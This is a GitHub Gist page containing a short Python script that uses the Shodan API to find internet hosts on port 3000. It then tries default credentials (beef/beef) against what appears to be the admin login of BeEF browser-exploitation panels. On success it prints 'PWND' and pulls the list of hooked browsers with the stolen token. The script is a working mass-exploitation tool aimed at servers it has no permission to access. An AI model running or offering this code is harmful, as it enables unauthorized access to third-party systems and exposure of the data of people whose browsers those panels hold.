Skip to content

Instantly share code, notes, and snippets.

@thehappydinoa
Forked from tmap/picanha.py
Created September 23, 2018 19:55
Show Gist options
  • Save thehappydinoa/29e00ffccdd412d7eda3cf7e11f1cd2b to your computer and use it in GitHub Desktop.
Save thehappydinoa/29e00ffccdd412d7eda3cf7e11f1cd2b to your computer and use it in GitHub Desktop.
import shodan
import sys
import requests
API_KEY = "apitoken"
try:
api = shodan.Shodan(API_KEY)
result = api.search('port:3000 product:"Apache httpd" centOS')
for service in result['matches']:
ip = service['ip_str']
try:
r = requests.post('http://'+ip+':3000/api/admin/login', json = {'username':'beef', 'password':'beef'})
if r.status_code==200:
print 'PWND',ip,str(r.status_code)
data=r.json()
token=data['token']
rg = requests.get('http://'+ip+':3000/api/hooks?token='+str(token))
print rg.text
elif r.status_code==401:
print 'Wrong passwd',ip,str(r.status_code)
else:
pass
except:
pass
except Exception as e:
print 'Error: %s' % e
sys.exit(1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment